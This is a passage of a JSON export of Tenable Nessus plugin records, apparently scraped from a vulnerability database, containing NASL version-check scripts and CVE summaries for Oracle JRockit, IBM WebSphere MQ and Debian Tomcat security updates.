value:\"cpe:/a:oracle:jrockit\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jrockit_installed.nasl\");\n script_require_keys(\"installed_sw/Oracle JRockit\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Oracle JRockit\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nver = install['version'];\ntype = install['type'];\npath = install['path'];\n\nif (ver =~ \"^28(\\.3)?$\") audit(AUDIT_VER_NOT_GRANULAR, app, ver);\nif (ver !~ \"^28\\.3($|[^0-9])\") audit(AUDIT_NOT_INST, app + \" 28.3.x\");\n\n# Affected :\n# 28.3.9\nif (ver =~ \"^28\\.3\\.9($|[^0-9])\")\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n # The DLL we're looking at is a level deeper in the JDK, since it\n # keeps a subset of the JRE in a subdirectory.\n if (type == \"JDK\") path += \"\\jre\";\n path += \"\\bin\\jrockit\\jvm.dll\";\n\n report =\n '\\n Type : ' + type +\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 28.3.10' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-04T14:24:23", "description": "According to its self-reported version, the IBM WebSphere MQ server installed on the remote Windows host is version 7.1 without fix pack 7.1.0.8, 7.5 without fix pack 7.5.0.7, or 8.0 without fix pack 8.0.0.5. It is, therefore, affected by multiple vulnerabilities :\n\n - A buffer overflow condition exists in IBM JVM due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code under limited circumstances.\n (CVE-2016-0264)\n\n - An unspecified flaw exists in the JCE subcomponent that allows an unauthenticated, remote attacker to disclose potentially sensitive information. (CVE-2016-3426)\n\n - An unspecified flaw exists in the JMX subcomponent that allows an unauthenticated, remote attacker to impact confidentiality, integrity, and availability. No other details are available. (CVE-2016-3427)", "cvss3": {}, "published": "2016-08-19T00:00:00", "type": "nessus", "title": "IBM WebSphere MQ 7.1 < 7.1.0.8 / 7.5 < 7.5.0.7 / 8.0 < 8.0.0.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0264", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:ibm:websphere_mq"], "id": "WEBSPHERE_MQ_SWG21982566.NASL", "href": "https://www.tenable.com/plugins/nessus/93049", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93049);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-0264\", \"CVE-2016-3426\", \"CVE-2016-3427\");\n script_bugtraq_id(86421, 86449);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"IBM WebSphere MQ 7.1 < 7.1.0.8 / 7.5 < 7.5.0.7 / 8.0 < 8.0.0.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A message queuing service installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the IBM WebSphere MQ server\ninstalled on the remote Windows host is version 7.1 without fix pack\n7.1.0.8, 7.5 without fix pack 7.5.0.7, or 8.0 without fix pack\n8.0.0.5. It is, therefore, affected by multiple vulnerabilities :\n\n - A buffer overflow condition exists in IBM JVM due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code under limited circumstances.\n (CVE-2016-0264)\n\n - An unspecified flaw exists in the JCE subcomponent that\n allows an unauthenticated, remote attacker to disclose\n potentially sensitive information. (CVE-2016-3426)\n\n - An unspecified flaw exists in the JMX subcomponent that\n allows an unauthenticated, remote attacker to impact\n confidentiality, integrity, and availability. No other\n details are available. (CVE-2016-3427)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21982566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate fix pack according to the vendor advisory.\nAlternatively, interim fix IT14908 can also be applied to mitigate\nthese vulnerabilities if a fix pack is not available.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_mq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_mq_installed.nasl\");\n script_require_keys(\"installed_sw/IBM WebSphere MQ\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"IBM WebSphere MQ\";\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\nversion = install['version'];\npath = install['path'];\ntype = install['Type'];\nfix = FALSE;\nfixes = make_array(\n \"^7\\.1\\.0\\.\", \"7.1.0.8\",\n \"^7\\.5\\.0\\.\", \"7.5.0.7\",\n \"^8\\.0\\.0\\.\", \"8.0.0.5\"\n);\n\n# Find the fix for our version\nforeach fixcheck (keys(fixes))\n{\n if(version =~ fixcheck)\n {\n fix = fixes[fixcheck];\n break;\n }\n}\n\n# Version not affected\nif(!fix)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# Check affected version\nif(ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:04:13", "description": "Multiple security vulnerabilities were discovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific maintainer scripts. Those flaws allowed for privilege escalation, information disclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete fixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-20T00:00:00", "type": "nessus", "title": "Debian DSA-3738-1 : tomcat7 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735", "CVE-2016-9774", "CVE-2016-9775"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tomcat7", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3738.NASL", "href": "https://www.tenable.com/plugins/nessus/96017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3738. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96017);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8735\",\n \"CVE-2016-9774\",\n \"CVE-2016-9775\"\n );\n script_xref(name:\"DSA\", value:\"3738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Debian DSA-3738-1 : tomcat7 - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple security vulnerabilities were discovered in the Tomcat\nservlet and JSP engine, as well as in its Debian-specific maintainer\nscripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=845385\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=845393\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/tomcat7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2016/dsa-3738\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the tomcat7 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 7.0.56-3+deb8u6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:42:50", "description": "Multiple security vulnerabilities were discovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific maintainer scripts. Those flaws allowed for privilege escalation, information disclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete fixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-20T00:00:00", "type": "nessus", "title": "Debian DSA-3739-1 : tomcat8 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735", "CVE-2016-9774", "CVE-2016-9775"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tomcat8", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3739.NASL", "href": "https://www.tenable.com/plugins/nessus/96018", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3739. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96018);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8735\",\n \"CVE-2016-9774\",\n \"CVE-2016-9775\"\n );\n script_xref(name:\"DSA\", value:\"3739\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Debian DSA-3739-1 : tomcat8 - security update\");\n\n script_set_attribute(attribute